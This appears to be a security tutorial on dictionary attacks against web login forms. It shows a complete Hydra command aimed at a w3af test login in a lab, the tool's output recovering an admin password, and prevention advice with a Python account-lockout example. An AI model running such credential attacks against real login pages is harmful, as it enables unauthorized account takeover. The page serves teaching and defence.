Automated Brute Forcing on web-based login
Last Updated: 29 Sep, 2022
Brute-force attacks work by generating every possible combination that could make up a password and testing each one to see whether it is the correct password. As the password's length increases, the average time needed to find the correct password increases exponentially. This means short passwords can usually be discovered quite quickly, but longer passwords may take decades [Source: Wikipedia].
It may be feasible in some situations, as computer hardware is getting faster and faster. A simple brute-force attack would start with one-character passwords, then two-character passwords, and so on, trying all possible combinations until one works.
A better idea is a "dictionary attack", which tries the words in a dictionary (or a list of common passwords) instead of all possible passwords. This can be very effective, because many people use such weak and common passwords.
We can use an automated tool to brute-force a web-based login form.
Using Hydra to dictionary-attack web-based login forms
Hydra is an online password-cracking tool for dictionary attacks. It tries lists of usernames and passwords until a successful login is found. It is multi-threaded and can try username/password combinations at a rate of thousands per minute.
Hydra can be used to attack many different services, including IMAP, SMB, HTTP, VNC, MS-SQL, MySQL, SMTP, SSH, and many more.
This tool should not be used to attack websites or services where you do not have permission to do so. Use this for legitimate testing purposes only.
An example attack
The Web Security Dojo has various vulnerable applications that you can use to test these techniques. As an example, the w3af testing framework has a test login at the following location:
http://192.168.1.69/w3af/bruteforce/form_login/
The important parts of the HTML form are:
HTML
<form name="input" action="dataReceptor.php" method="post">
    Username:
    <input type="text" name="user">
    Password:
    <input type="password" name="pass">
    <input type="submit" value="Login">
</form>
If we put in one wrong username and password combination we get:
Bad login, stop bruteforcing me!Bad u/p combination for user: a
Now we have the information we need to attack this login form, and we can use it to construct a Hydra brute-force attack as follows:
hydra 192.168.1.69 http-form-post "/w3af/bruteforce/form_login/dataReceptor.php:user=^USER^&pass=^PASS^:Bad login" -L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt
If we break this up:
Host = 192.168.1.69
Method = http-form-post
URL = /w3af/bruteforce/form_login/dataReceptor.php
Form parameters = user=^USER^&pass=^PASS^
Failure response = Bad login
Users file = users.txt
Password file = pass.txt
Threads = -t 10
Wait for timeout = -w 30
Output file = -o hydra-http-post-attack.txt
Hydra basically iterates through all the username/password combinations, until it gets a response that does not contain the text "Bad login". When we run this attack we get:
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-08-22 13:11:03
[DATA] 5 tasks, 1 servers, 5 login tries (l:5/p:1), ~1 tries per task
[DATA] attacking service http-post-form on port 80
[STATUS] attack finished for 192.168.1.69 (waiting for children to finish)
[80][www-form] host: 192.168.1.69 login: admin password: 1234
Hydra (http://www.thc.org/thc-hydra) finished at 2011-08-22 13:11:07
As you can see, this was successful and found the user "admin" with password "1234".
Prevention
- The first defense is to implement an account lockout policy. For example, after three failed login attempts, the account is locked until an administrator unlocks it.
- We should use a challenge-response test to prevent automated submissions of the login page. Tools such as the free reCAPTCHA can be used to require the user to enter a word or solve a simple math problem to ensure that the user is, in fact, a person.
- Any web application should enforce the use of strong passwords. At a minimum, requiring users to choose passwords of eight characters or more with some complexity (letters and numbers, or requiring one special character) is an excellent defense against brute-force attacks.
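As an added illustration of the lockout policy above (example code written for this page, not from the Hydra project or the w3af test application), the following in-memory login handler locks an account after three failed attempts; the class name LoginGuard, the stand-in PBKDF2 hashing and the string return values are assumptions for the example.

```python
import hashlib
import hmac
import os

MAX_FAILURES = 3  # lock after the third consecutive failure, as in the policy above

def hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2 from the standard library (a deployment would use bcrypt/argon2)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

class LoginGuard:
    """In-memory login handler (assumed name) that locks an account after MAX_FAILURES."""

    def __init__(self, max_failures: int = MAX_FAILURES):
        self.max_failures = max_failures
        self._users: dict[str, tuple[bytes, bytes]] = {}  # user -> (salt, hash)
        self._failures: dict[str, int] = {}
        self._locked: set[str] = set()

    def register(self, user: str, password: str) -> None:
        salt = os.urandom(16)
        self._users[user] = (salt, hash_password(password, salt))

    def attempt(self, user: str, password: str) -> str:
        """Return 'ok', 'bad' or 'locked'; 'bad' never says whether the user exists."""
        if user in self._locked:
            return "locked"
        record = self._users.get(user)
        if record is None:
            # Unknown user: still do one hash so response time does not reveal valid
            # usernames, and still count the failure so the reply sequence looks the same.
            hash_password(password, b"\x00" * 16)
            ok = False
        else:
            salt, expected = record
            ok = hmac.compare_digest(expected, hash_password(password, salt))
        if ok:
            self._failures.pop(user, None)  # success resets the counter
            return "ok"
        self._failures[user] = self._failures.get(user, 0) + 1
        if self._failures[user] >= self.max_failures:
            self._locked.add(user)
            return "locked"
        return "bad"

    def unlock(self, user: str) -> None:
        # Administrator action: clears the lock and the failure counter.
        self._locked.discard(user)
        self._failures.pop(user, None)
```

Locking on failures alone lets anyone lock out a legitimate user on purpose, so a timed unlock or per-source throttling is usually combined with it.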
Sources
http://searchsecurity.techtarget.com/definition/brute-force-cracking
https://en.wikipedia.org/wiki/Brute-force_attack
https://hackertarget.com/brute-forcing-passwords-with-ncrack-hydra-and-medusa/
https://sourceforge.net/projects/websecuritydojo/